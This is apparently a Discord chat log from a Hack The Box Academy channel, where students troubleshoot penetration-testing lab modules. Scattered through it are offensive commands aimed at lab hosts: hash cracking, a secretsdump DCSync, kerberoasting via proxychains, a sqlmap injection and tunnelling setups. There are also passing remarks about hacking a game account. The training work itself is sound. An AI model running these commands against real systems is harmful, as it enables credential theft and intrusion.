#modules
How are you fetching the mail? I'm on mobile so the compression on that screenshot is absolutely fucked
1 FETCH 1 all
Switch all with body[]
I linked a blog for useful imap commands and stuff a while back
hi
thanks! ❤️
You can also get the email from pop3s
Just as an fyi
Imap is just nicer to navigate with
yes if available go for imap
any hints how do I crack this hash. I used 2100 mode. Could not crack it with rockyou
link ?
to the section?
yes please
ah ok i am not yet there sorry
maybe try another wordlist
can you show the syntax ? dm is ok
or mask it
yea no problem
||hashcat -m 2100 admin.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt||
looks right to me
v1
oh cool im doing v2 tomorrow
I'm not at this part yet but are you sure the mode is 2100? I ask cause I choose the wrong mode all the time and waste time trying to figure out what's wrong lol
im nervous af i dont do well on tests
the hash has $DCC2$10240# I check hashcat examples it was 2100
I guess if hashcat cannot do it there has to be another path
Ok cool, just wanted to make sure. You wouldn't believe how much time I've wasted and the only thing I did wrong was pick the wrong mode like a moron lol
try this at the end ||--force --potfile-disable||
gl with it, v1 was a fun exam
restart target
after that im going for CBBH just like you did 😅
Tried that, port still closed. I'm thinking they are giving me the wrong VM
i already started the modules for it
Try with a regular scan, not syn
netcat -v ip 2121
Still closed... this is so weird.
Does it give you anything?
I also tried that, connection refused
I can interact with other services on the VM, so it can't be a connection issue
Weird, contact website support imo
Yeah, will do. Thanks for trying to help me
restart target and wait for 5-6 mins 🙂
The support doesn't really look at the discord
Good luck 🍀
thanks🥰
i took the ewpt after, but take my advice and dont take that. just do the cbbh like you plan
i already got the voucher for it
anyone studying Introduction to Digital Forensics ??
I tried to use mimikatz and do a dcsync and it was not possible because klist was empty any help?
no klist no ticket
was cbbh hard or fun? a week for a test seems a bit scary ngl
Why „or“?
An exam can be difficult and still be fun
yea I guessed so but what should I do according to BH only admin has dc rights
yeah i meant was it really hard or did the modules do the trick and he passed with confidence
both. if youre fairly new to hacking, expect to fail it. but dont give up on it. take your time studying through the material and take notes of your assessments/labs that you think are challenging
The modules contain all the knowledge you need for the exam. Nevertheless, the exam was difficult from my point of view.
dude I just switched and there was SRB cant miss a second here I guess
Damn that linked looked so tempting to click on too 😂
I wouldn't doubt that vid is NSFW btw, given their name. People do dumb shit "cosplaying" characters
well good to know thanks for the input guys
It was bloody roblox
oof
Hello Everyone. I am trying to complete the Footprint Lab - Hard but I am stuck. I am currently logged into the machine as tom but that's where I am stuck. I checked the bash history and I ran linPEAS. I feel like I am over thinking it
lol i went out for 5 secs and party is on
Arguably worse
lmao
History is definitely important if I recall that lab
any help plis
too lazy to change it now
Perhaps seeing the services they interacted with is useful
i see tom logged into mysql but i am searching for a password
Just use his password
are you working as a pentester rn or is this just a hobby for you? (hope its not to personal😅 )
got damn it lol
im in appsec
cool
but work close to pen teams
i'm trying to find my first job as a junior but id really know how to search for it
you can dm me if you about whatever, dont want to get too off topic for the channel
idk the password. I am using a private key to log into the box
You should have his password too
if you don't know it > crack it
You retrieved it from your walk
Footprinting, hard- no cracking
how can you remember all that 🙂 ?
the password was to login to the imaps. tried it with mysql and it didnt work
It should
ill try it again
Make sure you copy/paste it
got damn it lmao thanks @fathom pendant
Vaults within vaults of keywords and synapses
did my "extension" not work ?
You'll have to consult a doctor for that
for the syntax lol
I think @next bronze has an lsa dump tool
you can dump lsa via cme nxc too
I have dumped it i just wanna crack it
this is what i got from admin at ms01
I need admin/inlane to dcsync according to bh
I tried to use mimikatz but there is no klist
So I finished AD Skills Assessment 1 last night, and I was going over my notes to review my process. I had a couple of questions but I wasn't sure how I could ask them without spoiling anything but to try to keep it as vague as possible and put it in spoiler tags: ||I wasn't able to upload Chisel to the web-shell host as the web-shell kept crashing so I instead tunneled via netsh and RDP which was fine but for the last questions I was definitely a bit lost on how to authenticate to the DC as I had to do it from the RDP Session I was in. After some googling and remembering that mimikatz can do PTH I used mimikatz and psexec.exe. And I was wondering was there another way to PTH in this scenario? Some sort of Powershell PTH? Also could I have used netsh.exe in a similar way but instead of forwarding the traffic to the RDP port, forward it to another port so I can then run tools from my attack host like secretsdump.py?||
this module is killing the little brain cells i have
are you having tunneling problems?
then fear not ligolo-ng is the tool for you
its low brain cell requirement makes it super easy to use and does not require admin
||shade|| : once I used it I was spoiled
Yeah I just wasn't able to upload certain tools through the web-shell it kept crashing and giving me an error. My initial plan was either Chisel or ligolo-ng which I haven't used yet but I was excited to try it out. Maybe I could've tried uploading the files to the webshell host in another way though
well we can try doing it again if you want my view. tho marcie and xre0us helped a bunch
hi, I'm in the Other Notable Applications, can anyone help me? i'm trying to catch rev shell
You know I was just thinking maybe I was trying to upload the files to a directory that didn't have write access and that may have been the error. I didn't even consider that because I was getting so frustrated so I just went ahead with netsh.exe
I will complete (hopefully) the skill assessment 2 and put this module to rest until the exam
Yeah I think I'm going to try doing that assessment again after I finish AD skills assessment 2 but this time make sure I get either chisel or ligolo running to make everything easier
assessment 2 is taking me a week to complete
i did many modules with pwnbox but now i use my vm
Yeah I've heard it can be tricky
I want to use it too but the lag is too much
I thought of using ngrok and tunnel my connection with pwnbox
Right it's so annoying sometimes
but too much trouble
i will have a look into ligolo tomorrow
check john hammonds vid its detailed
as always 😄
oh cool I didn't know he had a vid on ligolo I'm gonna go check that out right now
i will too after this : https://www.youtube.com/watch?v=wwmCHeYd1I4
damn
I put it in my watchlist
I think he did a vid on this
I don't suppose anyone wants to DM me Kira's mutated password? Pretty please. I could have sworn I saved it somewhere. Hard lessons have been learned. Always save creds. Don't name files "hashyhash.hash2" and other variations of awful 
he was sponsored if I remember
i don't know what is wrong
Nope, you can recrack it or look through the pot file for it
at least save it for the whole module .. i learned it today too
It's what I deserve 
5585 open ?
evil winrm?
maybe
Wait, what's a pot file...
I am using that to connect to admin but I want its domain acct
.potfile is where cracked hashes get saved
Oh wait you got kira's pw through bruteforcing a service
I have access to A and B. need to access C but only admin has dc rights. I tried to crack sql_svc hash it did not work
dm @sterile epoch
Just bruteforce ftp or something with the mutated list and wait
Yeah and I can almost see it in my head 🤣
¯\_(ツ)_/¯
Yeah I remember I made the same mistake and had to do the bruteforce all over again never made that mistake again lol
Shouldn't take more than 10 minutes
Guess I gotta go back. Lesson learned
You don't learn lessons if someone just holds your hand and gives you something you should have saved
I always save credentials even before the module
Just a habit
Just during this module I started saving the results of everything too. So I'm extra sickened that one slipped through.
Fun module though!
I have a full creds.txt that gets updated per module with creds I find
I narrow standard/local users from /home/ and C:\Users
If I have a foothold*
I could do with seeing a pro's workflow cause things got confusing fast on the PTT.
PTT was interesting because it deals with domain joined hosts/accounts
Not just local
Thanks! I will deffo do that
Good news guys. I found a file called......
kira
On my desktop
i tried metasploit too
This is why I keep all my files separated
I have directories and such dedicated to the modules/sections
Yeah I think that was my first time jumping about different machines in this module and I realised I was wasting a lot of time trying to remember who was who and such. Those little inefficiencies bug me
trying to do a double pivot with ligolo-ng, getting this error:
error: a tunnel is already using this interface name. Please use a different name using the --tun option
Anyone got any advice?
The VM associated with the Attacking FTP section has the expected answers, did you try resetting the instance? Others have solved it very recently also. If you continue to face issues please raise it with our support department.
Need to speak to a person? Learn how to reach our support via HTB Labs.
Also, that's a T2 module, so please avoid posting any spoilers @dense pewter 🙂
T0 is open season, but anything over that, please use discretion
Hi is there a channel I can ask a general question about a box?
If it's an active box mind, do not post information that spoils the experience for others.
It says 🔒No Access for the provided link
It is an active box, I won't mention the name or any spoilers just a very generic question
Check out #welcome - to access other channels, you'll need to identify with an account on https://app.hackthebox.com
sweet thanks
Stop the pivot on session 1, start it on session 2; or create a new interface for it
new interface worked - cheers
Mr. Almond our hero?
Sorry, thought that adding spoilers would be enough.
He also failed his first cpts attempt due to not respecting the time commitment (he was moving at the time he started it)
Spoiler tags really don't do much, anyone can read them.
masking is ok ?
"masking" do you mean doing stuff like u*:p* for username:password and such?
as long as both parties understand what's being referred to
Yeah.. if it's not a direct spoiler, I think it's fine. That goes for things like usernames, passwords, tools etc, along with techniques
half the time it's just "read the section about x again"
or "you spelled it wrong, L + ratio"
can I pm regarding a general box inquiry?
Sorry, I can't give any guidance on content, HTB staff
Ook
or if it's the recent box: #1205934783197356062
Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
the solution i am trying is nslookup -type=NS inlanefreight.htb
but not getting required output
please guide me to follow proper approach to solve this task
you need to add the target ip after
nslookup -type=NS inlanefreight.htb ip
Hi everyone,
I'm doing Misc CSRF Exploitation in the ADVANCED XSS AND CSRF EXPLOITATION module and when I log in into the vulnerable app, I immediately got logged out and there is no ||Promote button||, does anybody know should it work like that?
Someone who did the Skill Assessment lab from Blind Sql injection module?
I would like to know how you scripted the first part 😄
(I don't need a nudge, already finished the lab)
I'm curious. how am i 41% done with the course but only 18% on offensive and 7% on general
hello everyone im new here
there's more than just the pentester path
Do I introduce myself?
no this isn't a gen-chat
ohhh so the bubbles are combination of all
thank you buddy able to resolve this issue thanks alot
there's instructions in #welcome to access more of the server
and #welcome explains the server
if you're talking about myself, personally, i just exist as another user in the framework
but that conversation isn't for this channel
Just on the organisation thing we spoke about earlier, I found a recommendation for this pen test data management tool. https://github.com/KvasirSecurity/Kvasir
I haven't looked at the code
Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer
the solution i am trying is nslookup -type=any -query=AXFR inlanefreight.htb 10.129.79.219
but not getting required output
please guide me to follow proper approach to solve this task
hint: localhost/loopback
sorry did not get
what is the localhost/loopback ip
:)
127.0.0.1
but in question its asking about total number of zones on name server
you mean in answer how many 127.0.0.1?
@mystic loom So, there is a tool in PowerSploit, which is indeed the answer
How to get to the answer? No idea. I think I discussed this with five other people, and everyone so far has brute-forced it
There might've been someone who actually knew the answer
Well.. Guess im part of the club now haha
hello there, happy Friday , did anyone have this issue, when was doing Citrix Breakout?
Can anybody help with the ADVANCED XSS AND CSRF EXPLOITATION module?
I do ty
there's not really a reason to crack lsass dumps, you get ntlm hash, which you can pth, or kerberos tickets, which you can ptt
oh you dump lsa, not lsass
I did inveigh first and it did not work, a few hours later it reset, I thought to try again and it worked, I got the hash for user C but cannot login via evil-winrm
you don't have to get a shell to dcsync, read the dcsync section again
if that's what you want to do
but only administrator.inlane has dc permissions
I cannot get to admin.inlane
I dumped lsass and got a hash for inlane.admin
now I am stuck
I could not crack the hash and its not nt hash
do I need -t48 when attacking ftp or can i use it without the -t option
-t is for threads to use you can omit it
no default is 8 iirc
its not 8
try and see if it crashes just restart
#modules message thats the closest I got to a sane solution
Module INFORMATION GATHERING - WEB EDITION
section Active Subdomain Enumeration
after starting the instance my Target: 10.129.79.219
question is Submit the number of all "A" records from all zones as the answer.
please guide me to follow proper approach to solve this task
any idea what to do?
bruh
you need to figure out this on your own; so far all you've done is ask questions on how to complete each task and doesn't feel like you've tried to do anything on your own
anyone got the same problem in ACL part ?
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
An error occurred while enumerating through a collection: The (&ObjectClass -like 'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
$Results | Where-Object {$_} | ForEach-Object {~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- CategoryInfo : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumerator) [], RuntimeException
- FullyQualifiedErrorId : BadEnumeration
Could someone help me with https://academy.hackthebox.com/module/77/section/843
I found an exploit for the target at exploitdb but i dont find it in msfconsole to exploit the target
is it a .rb file ?
its a .py payload
metasploit is .rb
do you have the creds of the user with GenericAll?
so how do i payload the target
with python(3)
yea I am trying to create a fake spn
I got it through inveigh
I was wondering if there is another way to get the hash. only dc came to mind
and inlane/admin has dc rights whose hash i have
I'm new to pentesting and usually all the necessary resources were always explained in the module
no, you got the hash through inveigh, the user was trying to authenticate MS01 and you captured the hash, it's not the same as other ways to get hashes
so I cannot get it through dc?
no problem. new to linux too ?
i tried different commands and i think i should get answer by nslookup -type=any -query=AXFR inlanefreight.htb 10.129.79.219 but unfortunately not get the required output
2 zones to query, add up the A records
yeah
you can but you'll need to be able to dcsync, and the hash type is also different, you can NTLMv2 through inveigh, which cannot be used for pth, for dcsync you get NTLM which you can
thanks
haven't seen this before, just use powerview and resolveguid I guess
see you later in a few years when i finished reading
it will not take so long 🙂 keep going 🙂
yes like on the website
anyone can help me with Attacking Common Applications - Skills Assessment I? I found the flag, but i can't read
So is it possible in this environment then I would try to do it later
I wanna increase my attack vectors
gn 🙂
it is possible when you dump everyone's hashes, unless the user is logged in elsewhere, you won't be able get their hash until you've compromised the domain
till now i have 3 users and one local machine admin still I cannot do dcsync. I guess I gotta wait till I have domain compromise
ok restarted the target ..... same error
so just started AD skills assessment II and I was just wondering is it possible to use Responder in tandem with Ligolo-ng?
from my testing ligolo can't forward smb traffic so no
it could work with chisel though
Fantastic, of course this is the one time I decided to try Ligolo-ng
I mean responder you just run and forget, it's not like you need to do much else with it
As a hypothetical though, say Ligolo-ng could forward SMB traffic, what would the syntax be for Responder. Would the interface just be the name of the tun you created for ligolo?
should be localhost/127.0.0.1, ligolo forwards that traffic to local ports
I tried using ligolo with smb it works
oh does it
yea I use it with smbclient
Okay good to know.
what's the set up? it didn't work last time I've tested
I set a single pivot and use smbclient through my host thats how I got the mssql string
oh like smbclient to a remote host
ok chatgpt fixed it 😉
yea that works but not the reverse, so you can't receive traffic to your side through smb
yea if you wanna reverse it then you gotta port forward it
I don't even know why I asked my question, my dumb ass forgot that there is a literal Linux attack host that I can run Responder on. Boy this assessment is off to a good start lol
use listener_add --addr 0.0.0.0:445 --to 127.0.0.1:445 --tcp
or another port
i know, this doesn't work when I've tested it
I dunno then i gotta try reverse
it always works for other tasks
oh yea I remember I used responder
on it I got a hash let me try doing it again give me a min
ok my bad responder does not work
I am back to my assessment
ligolo ?
damn sometimes i do not know if the lag is so bad or the machine hangs 😄
is this :
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
supposed to run for over 10 mins ?
i know but i want to at least do everything once
iirc that took like 10+ minutes
i watched some YT vids to fill the void
yes family guy running 🙂
mask it 🙂
sorry
"bloodhound shows I need C* to get to admin"
that's the point of the lab, if you can get admin then the genericall edge is pointless
ok, i use sharphound
i am here : ACL Abuse Tactics
okay is crackmapexec supposed to take an eternity to enumerate domain users, this thing has been running for like 25 minutes at this point I'm starting to wonder if it's even accurately enumerating real usernames
if the domain has a lot of users it will take longer, using ldap is a lot faster though
Now it feels like wasted time if I don't just let it finish lol
just open another terminal to run cme with ldap, whichever completes first
alright cme smb has a pretty good head start if ldap finishes before it that's crazy I'll give it a shot
Hey I am on lab Medium on footprinting and i have the sa:password for mssql and alex:pass for rdp but the studio doesnt have access i can guess it must be admin and looking on here others saying its admin so how do i obtain the admin password cause i have tried both passwords and will not work
run as admin: you have the password; alternatively rdp to administrator
thank you just got in it doesnt work copying and pasting have to rdp as admin
UAC doesn't like copy/paste
Thank you completed medium now i never used GUI of SQL hard to work out whats going. thanks again
I think SQLCMD is installed for CLI stuff
but also the GUI does have a button for query
Tnx
Can someone give me a hint in the right direction for AD skills assessment 2. I've logged into SQL01 using mssqlclient.py, and now have to get to the Administrator desktop for SQL01 and MS01, probably gonna take a break right now because I'm starting to get frustrated but any hint would be appreciated
Has anyone else target ip been deploying for 15 mins now?
switch the vpn server and download a new vpn and respawn the target.
I dont have the option to terminate a target ip if its still loading
reload the page.
I ended my browser session and its still deploying @soft cedar
how come there are no cheat sheets for the soc analyst path?
thats strange, try a hard reload: Ctrl + F5 or Shift +F5
i don't know what i should do. i set my account, i tried to verify my email and nothing would happen, so i completed Meow, then i had to go afk. when i got back i was logged out and i can't log back in, so do i make a new account or am i missing something
Message website support
thanks
Stuck on
WINDOWS PRIVILEGE ESCALATION: Citrix Breakout
Somebody please help me with this syntax, googled it found nothing relevant
the second google result https://unix.stackexchange.com/questions/173916/is-it-better-to-use-pwd-or-pwd
or just echo $(pwd) and you'll know what it does
Aah forgot the basics
hi
im currently doing surveillance machine
and a found the CVE but idk what i have to change in the POC
in this line
" response = requests.post(url, headers=headers, data=data, proxies={"http": "http://10.10.14.31:8000"}) "
Hey gamers, anyone alive can help me with the XSS phishing module?
The payload doesnt work when I try sending my ip in the request but it works when I try sending anything else
It even works with a random post server when I try locally but whenever I send it in the /phishing/send.php form i always get Issue in sending URL!
@next bronze man this kerberos attacks assessment is weird. Finally had time to resume it. Tried netexec, no dice. Decided to try impacket on a whim, now impacket works lmao
oh well still a fun module all around
that is indeed weird, is it a problem with the lab? I did the SA again the other day and even ptt through impacket didn't work
did you use impacket for the last question or the local shell
just the local shell since I was already there
huh maybe they did change something, I think that didn't work for me the last time
whats super weird is I was using proxychains so I can see that it hits port 389 successfully when it gets the machine information, but then the next request for 389 gets connection refused
┌──(kali㉿kali)-[~]
└─$ sudo proxychains /home/kali/.local/bin/nxc ldap 172.16.8.3 -k -u XXXXXXXXXX -p XXXXXXXXXXXXX --kerberoasting output.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:389 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.8.3:445 ... OK
SMB 172.16.8.3 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.INLANEFREIGHT.LOCAL:389 <--socket error or timeout!
LDAP 172.16.8.3 445 DC01 [-] INLANEFREIGHT.LOCAL\XXXXXXXXXXXXXXXXX [Errno 111] Connection refused
same output if I dont request kerberos auth -k too
that is weird
I solved it!
So when using ssh -D with proxychains, some tools like netexec uses the remote pivot's dns for resolving hosts it seems.
I added the DC to the pivot /etc/hosts and it works
tbh it's been a while since I used ssh pivoting, can't say I've ran into that problem. but nice I'll keep it in mind 
I normally dont use it either lmao
I'm pretty sure fox knows that, he used ssh for other reasons here
He already knows that I am sure xd
Hello, I have a small problem with the section. The first part in the interactive section, I don't know what the answer is. I tried everything
Damn I missed what it was I knew
ligolo
I think it's the interactive section but it doesn't work.
what module?
the introduction to academy
I'm sorry I just want to complete it, I'm a bit of a perfectionist
what is your the question and whats your answer?
what is the name of the first section of this module?
iirc towards the end of the module it talked about navigating htb academy
😉
you already know what the module is, so finding the first section in that module should be easy
you didn't, we are all here to help each other.
Intro to Network Traffic Analysis module, Tcpdump fundamentals. "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)". Like I know what switch i need to read .pcap files AND to read them with ASCII. And if i use them both to read a .pcap file it works but when i enter them in as the answer it doesn't. stuck for a long time kindly help
The answer format is 's… t…… -.. /…………….'
thanks alot got it
hi 🙂 any recommendation for a vpn `? udp or tcp ?
for academy? usually tcp
sorry for academy, ok i'll switch then 🙂
I found udp is much better for me
Just my preference, you could use icmp too
choose a server closest to you
that should be pretty fast
tbh it was never fast 🙂 but ok ... rdp is total pita
and i am on 100 mbit+
ok i changed the mtu size to 1492 seems a bit better now
Hello everyone
Im doing Shells & Payloads module and im doing that question
Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
Once i request devices.php the service is hanging too much
Is there any roadmap for HTB what are their plans of courses etc?
afaik cwee is very soon, and they do have the advanced versions of cpts and cdsa planned
but no roadmap or forecast time
I think more evasion such as applocker bypass soon, if they don’t plan to release or no one did it. I am interested to write a module for them
I could also write some intermediate level of forensics and malware module if they want
you got it
can anybody tell me that how to start hacking, I'm a newbie.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
ok seems like a eu vpn issue, us works ok
You should put something together and submit it. Who knows, maybe you'll be the next module author
This year is so busy, I need to do 12 certs… but maybe next year? Who knows
12 , now i am curious 🙂
I have already done 4 right now
anyone knows in "introduction to windows command line" "Skill Assessment part 3" what kind of flag should i find, it says only || "If you search and find the name of this host, you will find the flag for user2."|| But ive tried || "hostname" "systeminfo" "Get-ComputerInfo" || and i dont see anything related with a flag. Even the hint just say || systeminfo ||
i am going for cpts, oscp and maybe BSCP
I think I will do oscp after osce3
sadly you can't do oscp without the 90 days
Hi everyone, I'm doing the "password attack" module in the ptt section "from Linux", I became "root" but then I crashed, can you give me some tips?? Thank you 🙏
get root again?
"Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer."
can i get a nudge how to find the user please ?
Might be the wrong channel but is it possible to use ssh instead of pwnbox?
and if yes, how?
idk
I remember it was an option before but now I can't find the ssh connect config anywhere
download vpn and connect
I dont know anything about computers ngl
module and section?
Hey guys,
Regarding the broken authentication module for timing attack exercise,
it does not make sense, every time I'm getting different response time for different users, so how would I be able to determine the correct guess?
I mean the command to find it is right there in the section
yes after svc_workstation I became root but then I crashed
and then you try again, similar to how you get up after you trip
unless you dont do so
yes, i found it , thx 🙂
lasagna is for windows only 
last I checked they don't have support for linux anymore, you can try the python script though
I don't understand what you want to tell me... I don't understand the last questionnaire to answer
if u crashed when getting root, just try again
no... but from then on I don't know what to do
google it....
hm what could be wrong : ||secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5|| PW : ||-ync-aster7-7||
what's wrong with it
Password:
[-] RemoteOperations failed: [Errno Connection error (172.16.5.5:445)] [Errno 111] Connection refused
[*] Cleaning up...
that should be a part of your initial message
did you pivot
if you do it right it works 😉
could probably use pyinstaller to convert it to a binary
s
F
up?
check dms
check dms
no
leave
did he just got banned?
i hope so
I have taken care of it
he probably come back later
i was asked some times in dm of this
hacking a roblox account lol
i hacked a minecraft server the last days 😉
@astral inlet You can block him in your settings. Then he can no longer send you messages
Somebody please correct me..!!
Why this smbserver.py is not working..!!!
got question for you
are easy machines easy for you, like....can you just go and after 20 minutes be like "alr i got the root flag as well"
cuz its so fucking hard for me
on htb ? no
they are so hard even for beginner
i gotta constantly follow write ups to just even progress
as a beginner i would take other resources
can't see the error, scroll down. also you can use $(pwd) in your smb server command to start a share in the current dir, that's what it's for
tryhackme?
i dont get your point
thm is easier, yes
idk...either way, all the easy machines fuck me up cuz im too stupid for them
htb has starting point and academy, both are more beginner friendly
ik but still easy machines are pain
i got 1 more machine in starting point
and im doing with 2nd tier
hacking is getting experience and then use it to modify what you learned , it takes time
i am on it since 8 month now
do you try more or you learn more
i try everything for lets say 30-60 mins, if i can't get anywhere i look into walkthroughs
Hello folks. Can you help me with some info regarding cron jobs? If I have a cronjob that runs at the beginning of every month, and the computer got shut down and turned on on the 3rd or 4th day of the month, will the script that was scheduled for the 1st day of the month run?

fixed
Need to use sudo -su then rest
do more, you'll get the hang of it
and don't watch "first blood" on new machines 😄
i literally followed the write up for devvortex and when i try to get hold of the sql server, it just does nothing, all i type just does nothing and i gotta restart it
isn't devvortex still an active machine.. you should do retired machines if you want to follow writeups, and learn from the boxes, don't just blindly follow them
Thank you, that was what I needed
the older ones are easier
its a free one, but tnx for the tip to follow retired one
hopefully
Little help in WINDOWS PRIVILEGE ESCALATION: Citrix Breakout
Trying to run PowerUp.ps1 as per the section but have no permissions
trying to escalate priv by using powerup.ps1 as mentioned in the section
trying to run powershell as administrator asks for a password which i dont have..!
@rustic sage any idea regarding this?
read the error, what can you do about that?
advice: try to figure out things on your own instead on relying here all the time
sorry if i offended in some way..
but with this particular section i have been stuck from yesterday
I generally ask question here if i don't get something for lonnnnggg...!!!!!!
It's ok..!
I'm not offended, I'm saying you won't learn if you keep asking for help instead of trying other things
use the module, google and brain
"execution of scripts is disabled" what can you do about that?
I need to enable them through registry by show how..!
i took wireshark, looked matched proto. answer on hand in on first lines, but enabling http-log gave me empty files.
Did you find the answer? I don't get it: do I need to paste the content value from the detection string, or is it in the packet? C___e is the format only, not what you should find?
Yes I did. I included the hint on my message
question : are those questions in the cpts exam quite the same "level" as in the path ? i find some questions misleading tbh
It's nothing like that. More akin to the prolabs, or to a much lesser extent the machines.
ok i wanted to solve dante before entering cpts
Anyone can support in this question
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
I tried to convert the printed date to timestamp then run the script with an internal +-5 seconds then convert it to ms
then md5(htbadmin{timestamp})
and send it, it's not working
Did I miss anything?
it's actually +-1 second, and you'll need to convert the epoch time to the server time in utc
Can DM you?
Remember that 1000 tokens are generated every second. So you have generated 10000 tokens and also sent 10000 requests to the web server...
You mean something related to rate limiting?
No, but I don't know how strong the machines are. It must first be possible to process 10,000 requests instead of 2,000.
I used this JS code to convert it from UTC/GMT to localtimezone
var utcDateString = "2024-02-17 15:24:58";
var utcDate = new Date(utcDateString);
console.log(utcDate.getTime() / 1000)
but still wrong token
ok solved .... i love troubleshooting 🙂
hey guys i have a question,
im currently doing the "network enumeration with nmap" module and at "Host and port Scanning" i got to the question "Find all TCP ports on your target. Submit the total number of found TCP ports as the answer."
I know that i have to use nmap and the flag -Pn to get to the answer, but somehow doing it on the pwnbox the ports to find are shown open, but on my own vm it takes forever to scan and when i search for a specific port, e.g. 80, it shows as unfiltered, although in pwnbox it is shown as open.
Anyone know what the issue is here?
"unfiltered" just means there's no firewall
¯\_(ツ)_/¯
but also: don't run your tests with Pwnbox and vm at the same time
if you're testing with your vm make sure the Pwnbox is powered off
yes i am doing that, i run both separately
if you do ip a do you only have 1 vpn connection?
i m sorry im not sure how to identify if theres only one
sqlmap -u "192.168.0.20:8081/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D nexust_joomla -T #__users -p list[fullordering]
im having a problem because the table starts with # im getting this sql error:
sqlmap: error: -T option requires 1 argument
help
tun interfaces
it's likely it's interpreting the # as a bash comment, try using single quotes or escaping the #
single quotes did not help how can i escape the # ?
\
didnt work
only one tun0 is shown
you can also likely put it into a file and have it call from a file maybe? ¯\_(ツ)_/¯
Can anyone help with module "Pass the Ticket (PtT) from Linux".
The Optional Exercises "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished."
I have modified /etc/hosts file and also /etc/proxychains4.conf file.
I am unclear what chisel does. Is chisel to help transfer the ccache file to my box?
When I try to run proxychains4, I get an error.
What am I doing wrong?
chisel is a pivoting tool
still have the same problem
if you have burp intruder running: it's stopping the request until you forward it
do you think am i stupid MarcieLee
no, just a suggestion based off others experiences
don't jump straight to an assumption
many issues are dumb user error, that i've done too
Here is a guide for using chisel https://forum.hackthebox.com/t/attacking-enterprise-networks-double-pivot-using-chisel/267043
chisel saved my a$$ many times 😄
its weird because it works until i log-in
EU vpn ?
y
ok
solved my problems for today
please report this issue
@fathom pendant fix that
wtf
done 👍
still didnt find a way to execute that correctly
try harder
bruh
lmao im trying
don't be a dick lol
???
Hey guys, a quick question. I'm at "Information Gathering - Active Subdomain Enumeration" and at the end of that module you can see the explanation of how to use gobuster. What I don't get is that if you don't have permission of using that tool on a specific domain, you shouldn't do it. Then why the examples of gobuster are with facebook.com?
https://academy.hackthebox.com/module/143/section/1276 , lol the questions are totally misleading 🙂
But do you need to have an account or do they let anyone look for vulnerabilities?
if its subdomain enum i think anyone can do it
Hello
So i was doing the LFI module on HTB academy and i am stuck in a question which expects a flag as an answer. It tells me the location of the flag, i try to traverse and i get a flag with the format HTB{} but when i submit the flag its showing incorrect answer
any help is appreciated pls do ping me while replying
make sure no weird extra spaces
ye i did
nvrmind it worked, space was the issue
thx
damn AD module is huge 🙂
Repent of your sins and turn to God, for the kingdom of heaven is near. For God so loved the world that he gave his one and only Son, that whoever believes in him shall not perish but have eternal life.
great
i am still stuck 😦
no
where do i go for help on openvpn? i am trying to connect to hack the box vip machines, i am using a vip vpn but it says destination host unreachable when i ping

when you connect to the vpn; do you have initialization sequence completed? If so: open a new terminal; sometimes pings will fail if the box is configured to not accept them
nmap has the -Pn flag
yeah ive got that, ive done the whole htb cpts course so familiar with vpns already, but ive tried multiple machines, doesnt work, soon as i try a free machine it works fine
¯\_(ツ)_/¯
make sure you're on the right vpn if you're doing the labs platform
also read #welcome to find out how to access more of the server
It does say it'll take 7 days & that's with HTB's optimistic time frames
the thing is they are easy af at the start so u think it wont take long then half way through it just gets way more difficult
real
It's never the skill assessments that I waste time on either it's always some random sections exercise that gets me lol
fact bro, and its usually something stupid as hell. i think it was the port forwarding module, basically the flag wouldnt open up in the browser unless u closed all the tabs first. i was on it for like 3 days, some bs
I'm currently doing pivoting and I haven't had that happen to me, I'll keep a lookout for something like that
For module Understanding Log Sources & Investigating With Splunk, section Introduction to Splunk & SPL, third question
Why is the answer ||not waldo||? The query I used shows them as the one with the most login attempts within 10 minutes
